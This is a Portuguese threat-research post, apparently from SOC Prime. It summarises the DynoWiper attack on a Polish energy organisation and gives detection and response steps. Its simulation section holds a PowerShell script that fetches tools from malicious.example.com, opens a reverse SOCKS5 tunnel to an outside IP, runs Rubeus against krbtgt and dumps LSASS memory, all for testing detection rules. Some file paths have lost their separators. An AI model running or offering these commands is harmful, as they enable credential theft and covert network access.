SOC Prime Bias: Crítico

04 Feb 2026 15:19 UTC

Atualização DynoWiper da ESET Research: Análise técnica e atribuição

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Atualização DynoWiper da ESET Research: Análise técnica e atribuição
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

DynoWiper é um destrutivo wiper usado contra uma organização do setor de energia na Polônia, impactando múltiplos endpoints durante as operações. Os executáveis foram armazenados em um local compartilhado na rede e lançados diretamente desse compartilhamento. A ESET atribui a atividade ao Sandworm com confiança média. Uma vez executado, o malware corrompe arquivos alvos com bytes aleatórios e aciona uma reinicialização forçada para completar o impacto.

Investigação

A ESET recuperou três amostras—schtask.exe, schtask2.exe, e _update.exe—soltas em C:inetpubpub. Caminhos PDB embutidos sugerem que os binários foram compilados em um ambiente Vagrant. A engenharia reversa mostrou uma rotina de eliminação em três etapas, com duas variantes inserindo uma pausa de cinco segundos entre as fases. Artefatos pós-compromisso também incluíram a ferramenta Kerberos Rubeus e um proxy SOCKS5 rsocx dentro da rede da vítima.

Mitigação

O ESET PROTECT nos sistemas da vítima bloqueou todas as três variantes, limitando os danos. Reduza a exposição prevenindo a criação de tarefas agendadas não autorizadas e monitorando escritas inesperadas em diretórios compartilhados. Adicione uma lista de permissões de aplicativos e desative a execução a partir de compartilhamentos de rede sempre que possível.

Resposta

Identifique e isole hosts que executam schtask.exe, schtask2.exe ou *_update.exe de um compartilhamento. Preserve evidências voláteis, revise tarefas agendadas e rastros de implantação do PowerShell, e remova ferramentas como Rubeus e rsocx. Realize uma análise forense completa e restaure dados de backups limpos verificados.

Fluxo de Ataque

Execução da Simulação

Pré-requisito: O Controle Pré-voo de Telemetria & Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa do Ataque & Comandos:

    1. Estabelecer um proxy SOCKS5 reverso usando rsocx.exe. O adversário baixa o binário de um servidor externo, o coloca em %TEMP%, e o executa com o argumento -r 31.172.71.5:8008 para criar um túnel reverso de volta para o host C2.
    2. Realizar abuso de ticket Kerberos com rubeus.exe. A ferramenta é executada para solicitar um ticket de concessão de ticket Kerberos (TGT) para a conta de administrador do domínio e, posteriormente, forjar um ticket de serviço (s4u2self).
    3. Despejar memória LSASS usando procdump.exe (uma alternativa comum ao Gerenciador de Tarefas) para capturar material de credencial. Sysmon registra um evento de Acesso a Processo onde o processo do atacante acessa procdump.exe processo acessa lsass.exe com a máscara de acesso concedida 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)).
  • Script de Teste de Regressão:

    # -------------------------------------------------------------
    # Script de simulação – aciona a regra Sigma para rsocx, rubeus,
    # e despejo de LSASS. Execute com privilégios administrativos.
    # -------------------------------------------------------------
    
    # 1. Deploy rsocx.exe (proxy SOCKS5 reverso)
    $rsocxPath = "$env:TEMPrsocx.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath
    Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden
    
    # 2. Deploy rubeus.exe (abuso de Kerberos)
    $rubeusPath = "$env:TEMPrubeus.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath
    Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden
    
    # 3. Dump LSASS usando procdump (requer Sysinternals)
    $procdumpPath = "$env:TEMPprocdump.exe"
    Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip"
    Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force
    $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1
    if ($procdumpExe) {
        Copy-Item $procdumpExe.FullName $procdumpPath -Force
        Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait
    }
    
    Write-Host "Simulação concluída. Verifique o SIEM para alertas."
  • Comandos de Limpeza:

    # Termine quaisquer processos maliciosos remanescentes
    Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remova binários e arquivos dump
    Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue
    
    # Opcionalmente, exclua diretórios de download temporários
    Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "Limpeza concluída."